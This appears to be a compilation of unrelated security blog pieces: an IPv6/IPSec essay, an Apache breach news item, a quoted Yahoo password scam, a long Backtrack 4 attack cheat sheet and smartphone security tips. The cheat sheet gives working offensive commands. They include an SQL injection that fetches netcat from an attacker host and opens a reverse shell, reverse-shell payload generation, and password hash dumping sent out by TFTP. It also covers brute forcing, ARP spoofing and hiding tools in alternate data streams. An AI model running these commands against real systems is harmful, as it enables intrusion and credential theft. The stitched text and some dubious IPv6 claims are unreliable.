Data integrity (the Integrity Check Value carried in AH or ESP) – the receiver checks that the packet was not altered in transit before it processes it. The Security Parameter Index (SPI) in both headers is not an integrity service; it identifies which Security Association, and therefore which keys and algorithms, apply to the packet.
Diagram below shows fields in IPSec architecture
IPSec is the effort to provide security at the Internet layer using the mechanisms above. Being a common layer for all upper layer protocols, the Internet layer is the most likely to be attacked by an attacker aiming to gain control over the network or sniff the upper layer protocols. The layout of the TCP/IP stack makes the IP layer that much more important, and hence the security of the IP (network) layer the first priority for the network of any organization.
2) Why do we need IPv6?
For many years IPv4 has been in use and the websites we see nowadays are reached through the IPv4 address allocation scheme, but as time went by the number of hosts on the Internet kept increasing and IPv4 could not supply addresses for them all as expected, so there was a need for an Internet address allocation scheme that could provide many more addresses and not get exhausted.
An IPv4 address is 32 bits, divided into four octets of eight bits each, originally split into classes to give an address allocation scheme. The structure is:
A.B.C.D -> where A, B, C, D each have 8 bits and each bit has a value of either 0 or 1
This gives a maximum address space of 2^32 (about 4.3 billion) addresses.
An IPv6 address has 128 bits, each with a value of either 0 or 1, which gives 2^128 (about 3.4 x 10^38) addresses, enough to give every person on earth far more than 10 addresses each.
This was necessary given that the pool of public IPv4 addresses was nearly exhausted.
3) Is IPv6 more secure than IPv4?
Another feature claimed for IPv6 in the IETF documents is that it has better security than its predecessor. Let’s take a look at some of the remarks experts have made about IPv6 security.
“IPv6 mandates the inclusion of IP Security (IPSec), it has often been stated that IPv6 is more secure than IPv4”
The contradictory statement below rejects the idea that IPSec is mandatory in IPv6:
“IPSec was a required element in 1995 draft of IPv6 which was then dropped during revised draft in 1998”
The reason given for dropping mandatory IPSec in the 1998 revision was that, if mandatory, it would not have suited real-time applications like VoIP and video conferencing. This, however, puts IPv6 in the same category as IPv4 in terms of security.
The two statements above remain a point of argument, and it cannot be concluded from them whether it is compulsory to include IPSec in IPv6 or not. But the reason mentioned above can limit the mandatory inclusion of IPSec in IPv6, which I think is the real case and the most practical thing a network administrator would do to get a real and efficient network.
4) Why IPv6 is considered to be better than IPv4?
IPv4 has been a bit of a nightmare when it comes to the number of addresses available and their management. The newer IP protocol addresses this limit very nicely, with a very large number of network and host addresses available.
An IPv6 address is 128 bits, of which the low-order 64 bits are normally the interface identifier within a /64 subnet, which means there are far more than 10 addresses for each person on earth; the address space amounts to around 3.4 x 10^38 addresses. The number of public IPv4 addresses, by contrast, has nearly run out.
Also, the implementation of IPv6 reduces the address management burden on administrators since hosts can automatically configure their addresses based on the type of connectivity. Beyond this there are a number of further advantages: IPv6 provides better Quality of Service (QoS), it helps with multicasting, and it significantly reduces the number of fields in the IP header and simplifies the protocol. However the basic need of today’s IP infrastructure is security, with lots of transactions taking place online; it is because of security concerns that many users hesitate to buy or do business online. One of the advantages listed for IPv6 when the new address format was rolled out was that it has better security than its predecessor IPv4.
4.1) In terms of Security
NAT, Network Address Translation, is performed by an edge device that an organization uses to connect to the Internet. It converts the organization’s private addresses into public ones, as shown in figure 3 below. NAT is widely used in IPv4 environments because of the shortage of public addresses. However, the presence of a NAT device makes end-to-end security mechanisms such as IPSec hard to employ effectively, because packets travelling to and from the private network get their addresses rewritten to the NAT device’s address, and an IPSec integrity check that covers the IP addresses will then fail at the far end.
As DeNardis stated in her paper, the absence of NAT facilitates the use of end-to-end security mechanisms like encryption.
This reflects the way IPv6 hosts automatically acquire addresses and the enormous pool of public addresses that makes real end-to-end communication possible. The advantage of this model is that real end-to-end security mechanisms like encryption can be employed, and implementing IPSec in such an environment gives the benefit of authentication, confidentiality and integrity. This is unlike IPv4, where NAT devices play a vital role in organizations’ networks precisely to conserve the number of public addresses.
NAT is fine for address management, but the problem is that it compromises security for the end users. Since packets from the private network to the public network have to pass through the NAT device, which alters the source IP address in the IP header, IPSec protection that covers the address (the Authentication Header in particular) becomes useless: the receiving device detects the changed address through a failed integrity check and discards the packet. There are, however, mechanisms such as NAT Traversal (NAT-T, which encapsulates ESP in UDP) and NAT Discovery (NAT-D) which help protect IP packets in the presence of NAT.
Looking at IPv4 and IPv6 from this point of view, IPv6 would seem to have an edge over IPv4 if IPSec were compulsory, but a deeper look at modern applications like VoIP and video conferencing shows they would not be as successful as they are on today’s networks, which mostly do not use IPSec, because of the delay it adds to packet transmission. The point worth noting is that real-time applications like VoIP and video conferencing and full security of the network are hard to have together in such an environment; one of the two has to be sacrificed. Since end-to-end communication becomes possible in an IPv6 environment, security mechanisms together with real-time applications become possible, but this does not guarantee better security. This argument supports DeNardis’s statement that IPSec is optional in IPv6. (Real-time application means an application which tolerates no delay.)
The IPSec protocol, which was developed alongside the IPv6 draft, is carried in IPv6 extension headers, which makes it possible to use services like authentication and encapsulation. The extension header chain in IPv6 can contain an Authentication Header (AH) and an Encapsulating Security Payload (ESP), which protect the upper layer protocols. During the initial IPv6 draft, AH and ESP were considered mandatory, but in the 1998 revision [8] their inclusion was made optional. Even so, the best practice of incorporating security into networks makes IPv6 more secure in practice. Although there are disadvantages to end-to-end security for applications requiring real-time delivery, it still stands out as better than using a NAT device that renders the security mechanism ineffective.
4.2) Why are IPv4 and IPv6 equivalent when it comes to security?
The security mechanism designed for IPv6 is also, and more often, used in the optional fields of the IPv4 protocol. Since neither of them mandatorily implements the IPSec protocol in its basic infrastructure, neither can be considered superior to the other. Mandatory inclusion of IPSec in IPv6 would have made it better than IPv4, but this is not the case: IPSec implementation remains optional, depending on the security policy of the organization.
As DeNardis states in her paper Exposing IPv6 Security, if IPSec is the element which improves the security of IPv6, then IPv4 has the same security mechanism using IPSec, and hence both should be treated as equivalent.
With reference to  and , the implementation of IPSec remains the same in both protocols. Authentication Header (AH) and Encapsulating Security Payload (ESP) are the basic parameters of IPSec, and they can be incorporated in the IPv4 and IPv6 protocols equally easily. There are various ways to implement IPSec in IPv4 and IPv6, such as Transport Mode and Tunnel Mode. The details of implementation are outside the scope of this topic; please refer to RFC2406 and RFC2408 on the implementation of IPSec in Transport Mode and Tunnel Mode.
From what has been discussed until now, it can be concluded that IPv6 is not more secure than IPv4; in fact it carries the risk of some newer threats which make it much less secure than IPv4. The Internet protocol has been prone to many attacks in the past, such as Denial of Service, Spoofing, Flooding and Man In the Middle Attack (MIMA), while IPv6 with its new architecture can invite some new attacks in addition to the threats just mentioned.
Sean Convery and Darrin Miller, in their paper IPv4 and IPv6 Threat Comparison and Best Practice Evaluation (v1.0), identified a few of the new threats in IPv6, which are as follows:
· Reconnaissance
· Unauthorized access
· Header manipulation and fragmentation
· Layer 3 and Layer 4 spoofing
· ARP and DHCP attacks
· Broadcast amplification attacks
· Routing attacks
· Viruses and worms
Discussing every threat would exceed the limits of this paper; hence the remaining part discusses some of the important threats, such as Reconnaissance and Routing Attacks, and what impact the technology differences could have on these sorts of attacks.
5) Reconnaissance
Literally, reconnaissance means gathering as much information as possible about someone; in networking terms it means a passive mode of attack to gain information about an organization's network infrastructure. It is the first step of any active attack like DoS, MIMA etc., wherein the attacker searches for active hosts and ports in the network.
With respect to IPv4, there are only 255 addresses to scan when a Class C address is used, and it takes around 30 seconds to identify the active hosts and ports, whereby the attacker exploits the ARP cache of a host to gain information about the network. There are many ping sweep tools like NMAP which can easily identify active hosts in the network and flood the victim with ping (ICMP echo) requests.
With respect to IPv6, this mode of attack becomes almost impossible because of the enormous number of hosts in a subnet. According to the IPv6 address format, there are about 2^64 addresses per subnet (it varies with the subnet), i.e. around 1.8×10^19 addresses, which when scanned at modern processing speeds would take around 28 years to identify the active hosts. Also, there are no known ping sweep tools like NMAP which facilitate active scanning of devices and ports for IPv6.
However, attackers are smart enough to overcome these difficulties, and due to the technology used in IPv6, active hosts can be identified based on the following criteria.
1) The auto-configuration mode of IPv6 discourages administrators from using DHCP and DNS servers, which means that every host on the network should be given a valid DNS name in order to help the administrator manage the network. Since remembering host addresses such as FE80:0:0:0:202:B3FF:FE1E:8329 would require a lot of effort, administrators will use easy-to-remember addresses such as FE80:0:0:0:202:B3FF:FE1E:0BAD, and an attacker can then easily launch a dictionary attack and identify the active host addresses.
2) Most of the networks that will exist for years to come will be dual-stack, using both IPv4 and IPv6 addresses, whereby administrators will tend to use a single address for the IPv4 and IPv6 network, i.e. mapping the 32 bits of the IPv4 address into the last 32 bits of the IPv6 hexadecimal address. This makes address scanning much easier.
3) Most importantly, as stated in , the use of new multicast addresses for key devices like routers (FF05::2) and DHCP servers (FF05::3) gives the attacker an idea about the key devices in the network. The attacker can then use ping sweep attacks to choke the network, and other methods to compromise the key devices and mount attacks such as route redirection.
An attacker would take advantage of the above three weaknesses in IPv6 addressing technology to gain information about the victim's network, by exploiting the NS-ND (Neighbor Solicitation and Neighbor Discovery) cache of a host. And if the router is badly configured for security, there will be a risk of other modes of attack like Denial of Service (DoS) once the attacker knows about the victim's network.
This mode of attack will be quite difficult to carry out in an IPv6 environment compared with IPv4, but what is important is that this mode of attack is still possible in IPv6 no matter how big the address space is, and if IPv6 is used in dual mode with IPv4 it will be more open still; I think this will be the scenario for years to come.
6) Viruses and Worms
Viruses are not at all impacted by the implementation of IPv6, whereas worms find it difficult to locate active users and ports; thus IPv6 comes out better when it comes to threats from viruses and worms. Traditional viruses are not at all concerned about what protocol is used at layer 3, since a virus can be packed in an email and sent anywhere with a valid host address.
This sort of threat is the same for IPv4, but what is worth noting is that, since most administrators will hesitate to employ NAT devices and other devices like DHCP servers, it will be more difficult to implement security covers for the organization as a whole, and this will be a concern for users who don't have virus protection software on their laptops or personal computers. The advantage of using IPv6 is that worms will find it difficult to propagate, but the downside is that, since key devices in the network like routers will be easily identifiable from their IPv6 address, attackers will make every effort to target such devices with worms, which will cause significant network downtime.
7) Conclusion
Having discussed what exactly IPSec is and what makes vendors say that IPv6 is better than IPv4 in terms of security, and having identified various loopholes in the implementation of IPv6 and the threats arising from implementing the new technology, what impact it will have on most networks remains a question to be answered. However, from what I have discussed in this paper, I would say that IPv6 is not as good a technology as it is popularized to be when the term security is associated with it. Some key threats are presented in this paper which were also threats in IPv4; only the technology difference has made some of the threats easier to propagate while others find it more difficult to enter the network.
This is just the beginning of the implementation of IPv6 networks, but there are a remarkable number of fears that need consideration which were not given importance when IPv6 was drafted as IPng (later known as IPv6) in the 1995 draft specification. IPSec does satisfy the security mechanism employed in both Internet protocols; however, IPSec cannot be considered the only driving point in the implementation of IPv6, as it is also used in IPv4. The only known advantage of using IPSec in IPv6 is that it will make scanning for active hosts more difficult, but not impossible. The remaining part of attacking a victim will remain almost the same, and hence both protocols should be given equal respect when security is in question.
The security implementation in an IPv6 network remains in the hands of the administrator and his or her experience in configuring a secure network. For the time being and a few years to come, implementing IPv4 and IPv6 in dual mode will be a better option for networks. The real advantage of IPv6 will actually be seen when it is implemented globally, with the hope that no new software comes up that could defeat IPv6 networks. Much will rest on how the end user wants to implement security.

SSH key compromise shuts down Apache website

The Apache website was taken offline for several hours after attackers used an SSH key to access one of its servers.
Apache shut down all its machines as a precaution and switched over to an unaffected European mirror server. On its blog, the Apache Infrastructure Team said it did not believe any end users or downloads of its enormously popular Web server software were affected. The blog also said that the attackers failed to escalate privileges.
Apache stressed that the attack was the result of the compromised SSH key, not an exploit of Apache software. It said it was conducting an audit of all affected machines.
On Thursday, the key was used to access an account used for automated backups for the ApacheCon website. The attackers created several files, including CGI scripts which they used to launch rogue processes this morning on Apache’s production Web services.
There was no information on how the attackers were able to get the SSH key. In 2001, an attacker was able to compromise SSH on SourceForge and tunnel to the Apache site when an Apache developer logged into his SourceForge account.

Case study: Email Hacking

Email Hacking
Here we shall study a few case studies on how email IDs are hacked by means of social engineering. If this method is used cleverly, the hacker will be able to retrieve anyone's email password. In this method the hacker tries, by various means, to motivate the victim into falling for the trap. I shall describe various case studies in which the hacker tries to motivate the victim into giving away his/her email ID password.
Case Study 1
Below is a clever trick, where the hacker has tried to social-engineer the victim into revealing his/her Yahoo password.
Hacking yahoo is as easy as sending an E-mail.
Have you ever asked for your password from Yahoo? This system confuses that same system.
By simply emailing retrieve_pwd_yh@yahoo.co.uk this
var return[snd_mail] = your email@yahoo.com;
var enterpass_md5 = yourpass;
Fcn7662Nc2A_md5encryp_get_pass(TheIDofthepassyouwant);
This confuses the server to, email you the persons password.
All that is required is that you copy that script exactly!
Here is an example:
window.open(“http://www.eliteskills.com/”,null,”height=500,width=800,status=no,toolbar=yes,menubar=yes,location=yes, scrollbars=yes”); var return = bob@yahoo.com;
var enterpass = drowssap;
Fcn7662Nc2A_md5encryp_get_pass(joe14469);
In a matter of minutes you will have joe14469’s password!
How it works:
The program normally would read your login name find your password with functions setup by yahoo and re-email it to you. This time you are the one writing the message so you can manipulate the arguments of the functions. The code above resets the original variables in the function to alter the route of the sent password and user who queries the server. Basically it’s as if they sent the request for their password but it logs you in as the receiver. This is intended to be used only by system administrators to ban users or to bust illegal porn and drug sites. This is a first hand source and should not be used for illegal purposes other than password recovery of your own account. Any unlawful activity is your own responsibility and no one else. Note that if incorrectly sent (either login or syntax) the message is not replied to and due to the thousands of E-mails sent to the address each day it’s not moderated by an administrator.
Well, this much text is enough to motivate anyone to send his/her password to the hacker. If you read carefully, the hacker is trying to make the victim email his/her password to the hacker's email ID (retrieve_pwd_yh@yahoo.co.uk). But it is very clear to all readers that Yahoo doesn't have any such mechanism to retrieve passwords. So don't get trapped in such dirty games. This is not the only social engineering method used to hack email passwords; there are several other means by which the hacker will try to motivate the victim.

A Report On Backtrack 4

Table of Contents:
I. Networking
II. Services
III. Basics
IV. Foot printing
V. Scanning
VI. Windows Enumeration
VII. ARP Spoofing
VIII. Exploits
IX. Metasploit
What to do after gaining a remote shell
X. TFTP
XI. Netcat
XII. Passwords
XIII. Physical Access
XIV. SQL Injection
XV. Alternate Data Streams
XVI. A White Hat’s Pen Test
Networking:
Renew dynamic IP address:
dhcpcd -k :release IP address
ifconfig eth0 up :bring up the NIC
dhcpcd :get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 :set IP address & sub net mask
route add default gw 192.168.0.1 :set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf :set DNS server
Backtrack 4 config:
/etc/init.d/networking start :get a new ip address
/etc/init.d/wicd start :start wireless adapter
Services:
Apache server:
apachectl start start server on TCP port 80
apachectl stop stop server
SSH server:
sshd-generate generate ssh keys
/usr/sbin/sshd start server on TCP port 22
pkill sshd stop server
ssh user@targetIP
TFTP server:
atftpd --daemon --port 69 /tmp/ start server on UDP port 69 with a root directory of /tmp
pkill tftpd stop server
VNC server:
vncserver start server on TCP port 5901
pkill Xvnc stop server
Check what ports are listening:
netstat -ant show listening TCP ports
netstat -anu show listening UDP ports
netstat -ant | grep 22 verify ssh has started
netstat -anu | grep 69 verify tftp has started
Basics:
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share umount share
Edit a file:
nano test.sh create a new file and open it
Ctrl-X exit
Y save modified buffer
Enter write changes
chmod 755 test.sh make the file executable
./test.sh run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
cd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -
./configure
make
su root
make install
Footprinting:
Whois:
whois target.com contact info, emails, dates, name servers
ping www.target.com IP address of web server
whois targetIP network range
DNS:
dig target.com any
A Host: maps a domain name to an IP address
PTR Pointer: maps an IP address to a domain name
NS Name Server: server name for a delegated zone
SOA Start Of Authority: zone transfer and record caching
SRV Service locator: used to locate services in the network
MX Mail eXchanger: mail server for the domain
host -l target.com zone transfer
Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS TCP SYN scan or Stealth, half open (default)
-sT TCP full connect (very noisy)
-sU UDP scan
-PS SYN packet discovery (best against stateful firewalls)
-PA ACK packet discovery (best against stateless firewalls)
-PN don’t ping
-n no reverse DNS lookup
-A combines -O and -sV
-O OS fingerprinting
-sV service version (banner)
-p ports to scan (T:port,U:port)
-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL input list of hosts to scan
-oG grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U -p use interface eth0, don't display unknown signatures, promiscuous mode
point a browser to the targetIP read traffic on p0f
xprobe2 targetIP
Banner Grabbing:
nc targetIP port check if the port is open
nc 10.1.1.2 80
telnet targetIP port telnet may yield slightly different results
HEAD / HTTP/1.0
wget targetIP downloads the index.html file
cat index.html | more view file one page at a time, space bar for next page
q exit file
Windows Enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP name, OS and workgroup
smbdumpusers -i targetIP list users
smbclient -L //targetIP list shares
Using Windows
net use \\targetIP\ipc$ "" /u:"" start a NULL session
net view \\targetIP view shares
smbclient:
smbclient -L hostName -I targetIP enumerate shares
smbclient -L hostName/share -U "" connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin connect to open share with user name admin
rpcclient:
rpcclient targetIP -U "" start a NULL session
netshareenum enumerate shares
enumdomusers enumerate users
lsaenumsid enumerate domain SIDs
queryuser RID user info, try 500, 501, 1000, 1001
createdomuser create user account
ARP Spoofing:
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Exploits:
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep “#include”
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
Metasploit:
svn update update framework
Web Interface:
./msfweb open a browser to 127.0.0.1:55555
Console:
./msfconsole
help
show encoders, nops, exploits, payloads, auxiliary
search
use
show options
set e.g. set RHOST 192.168.1.3
show payloads
set PAYLOAD
show options
set e.g. set LHOST 192.168.1.2
show targets
set TARGET e.g. set TARGET 0
exploit
Interactive sessions:
sessions -l list active sessions
sessions -i e.g. sessions -i 4, interact with session 4
sessions -k e.g. sessions -k 4, kill session 4
Ctrl-Z background a session
Ctrl-C kill a session
jobs list exploit jobs running
jobs -K kill all jobs
Auxiliary scanners:
show auxiliary
use
set
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe import Nessus results in NBE format
db_import_nmap_xml import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest delete old database called pentest
db_create pentest create a new database call pentest
db_nmap targetIP run nmap through the framework and store results in database
db_hosts show hosts discovered
db_services show services running on each host
db_autopwn show options
db_autopwn -t -p -e select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i search for an exploit or auxiliary
./msfcli S summary info
./msfcli = PAYLOAD= E
Payload generator:
./msfpayload
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
Encode shellcode:
./msfencode
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
What to do after gaining a remote shell:
hostname name of computer
net users list users
net user x hack /add add user “x” with password “hack”
net user x /add add user “x” with NO password
net localgroup list security groups
net localgroup administrators list users in Administrators group
net localgroup administrators x /add add user “x” to Administrators group
Don’t use interactive programs like FTP from a remote shell
TFTP:
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat:
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024
Chat session:
target: nc -lvp 4444 start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 words
Passwords:
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf
wyd.pl -o output.txt www.target.com/ (the -f switch will read pwdump files)
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair backup copy not locked by the OS
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x Where x is Channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access:
Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
umount /mnt/sda1
reboot
SQL Injection:
nmap -sS -p 1521 targetIP oracle
nmap -sS -p T:1433,U:1434 targetIP ms sql
Release Version of SqlServer.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.384.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
' or 1=1-- minus minus closes the SQL query, everything after it is ignored
Enumerating table names:
' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--
Enumerating column types:
union select sum(column) from table --
union select sum(column2) from table --
Adding data:
' ; insert into table values('value','value2','value3')--
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker: nc -lvp 53
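The `' or 1=1--` bypass above, as an added example that is not part of the original cheat sheet: a string-built login query that the payload defeats, the parameterised version that it does not, and a small log-review heuristic built from the strings in this section. The users table and passwords are constructed demo data.

```python
"""Why the authentication-bypass string from the list works, and why a
parameterised query stops it. Added example, not part of the original
cheat sheet; the users table and passwords are constructed demo data.
"""
import hashlib
import re
import sqlite3

DEMO_USERS = [("alice", "correct horse"), ("bob", "hunter2")]   # constructed


def pw_hash(password):
    # Plain SHA-256 keeps the demo short; a real system uses a slow, salted hash.
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pwhash TEXT)")
    db.executemany("INSERT INTO users (name, pwhash) VALUES (?, ?)",
                   [(name, pw_hash(pw)) for name, pw in DEMO_USERS])
    return db


def login_vulnerable(db, name, password):
    """Builds the statement by string concatenation. A quote in `name` ends
    the literal early, `or 1=1` makes the WHERE clause true for every row and
    `--` comments out the password check that follows."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND pwhash = '{pw_hash(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, name, password):
    """Same query with bound parameters: the driver sends the value separately
    from the statement text, so it can never be parsed as SQL."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND pwhash = ?",
                     (name, pw_hash(password))).fetchone()
    return row[0] if row else None


# Heuristic for log review / WAF tuning, built from the strings in this section:
# a quote followed by a boolean, HAVING or GROUP BY clause, a comment marker,
# a UNION SELECT, or a chained EXEC of a stored procedure.
INJECTION_RE = re.compile(
    r"'\s*(or|and|having|group\s+by)\b|--|\bunion\s+select\b|;\s*exec\b", re.I)


def looks_like_injection(value):
    """True when a submitted form value matches one of the patterns above."""
    return INJECTION_RE.search(value) is not None


if __name__ == "__main__":
    db = setup_db()
    payload = "' or 1=1--"
    print("vulnerable login with payload ->", login_vulnerable(db, payload, "x"))
    print("parameterised login with payload ->", login_safe(db, payload, "x"))
    print("flagged:", looks_like_injection(payload))
```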
Alternate Data Streams:
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
A White Hat’s Pen Test by Muts:
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit the config file to open more ports on the router: 135, 139, 445, 1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server

Network Security Tips: How to achieve smartphone/mobile security in the enterprise

Smart-phones have quickly become yet another indispensable part of modern business. Features such as wireless email, Web browsing, personal information management and network access to corporate resources allow for quicker and better decision making and greater productivity.
However, according to a 2008 survey conducted by marketing research provider Decipher Inc., 70% of respondents said they accessed sensitive information on their smart-phone device when away from the office, and therefore outside the confines of their organization’s secure environment.
This latest extension of the enterprise IT infrastructure has quickly turned from asset to risk. To make the most of the smart-phone’s undoubted benefits, it is important to address smart-phone and mobile security, safeguarding the information stored on any mobile device, just as you would with a laptop.
The essentials of a smartphone, mobile security policy
This means your mobile security policy needs to mandate:
• Device passwords with a minimum length, complexity and update frequency.
• Data encryption, depending on its sensitivity or classification level.
• Password-protected inactivity timeouts.
• No access to read-only parameters.
• Limited access to riskier features, such as Bluetooth and instant messaging.
It is also recommended that only voice calls be allowed on any device that is locked. And before allowing smartphones within the enterprise, ensure they can be wiped remotely if lost or stolen.
One area that has been seen as frustrating and complex by users and administrators alike has been setting up a VPN connection on a smartphone. End-to-end encryption from the smartphone, over the transport medium, to corporate resources is essential to prevent over-the-air data leakage, and thankfully vendors are upgrading products to make the whole process far easier.
Network security company Astaro Corp. claims its users can now set up and use the iPhone’s IPsec VPN capabilities with no technical knowledge, while SSL VPNs from Sonicwall Inc. offer clientless remote access for smartphones.
The Mobile VPN in Microsoft’s System Center Mobile Device Manager also adds additional protection by authenticating both the device and user. If your mobile users, however, only need to access the odd application, such as Pocket Outlook and Microsoft Exchange, then you could look at encrypting the communication by sending POP and SMTP mail protocols over TLS without a full-blown VPN.
Depending on the nature of your mobile workers’ voice calls, you may want to consider using devices developed for the National Security Agency’s Secure Mobile Environment Portable Electronic Device (SME PED) program, like Sectéra Edge, a combination phone-PDA. Such devices are certified to protect wireless voice communications classified “Top Secret,” as well as restrict access to “Secret” email and websites. If this type of product is beyond your budget, Cellcrypt Mobile, from voice security provider Cellcrypt Ltd., offers end-to-end real-time encryption for BlackBerry smartphones without the need for specialised equipment. It operates on all major wireless networks, including 2G, 3G and Wi-Fi.
The key to a strong smartphone and mobile security policy is to make sure that any sensitive data that is accessed is protected in all forms. There are many places where it might be intercepted, so you need to have them all covered.
If data is encrypted on your database server, does it remain encrypted when it is transmitted to a smartphone, either through synchronisation, email or a Web app? If the user makes a call to discuss the data, does the conversation need to be encrypted? Can you execute a remote wipe if the device and its data are lost or stolen?
Smartphones are here to stay, so you have to commit to endpoint data protection. The mobile devices may be small, but they’re still Internet-connected computers, so don’t let them become a double-edged sword.

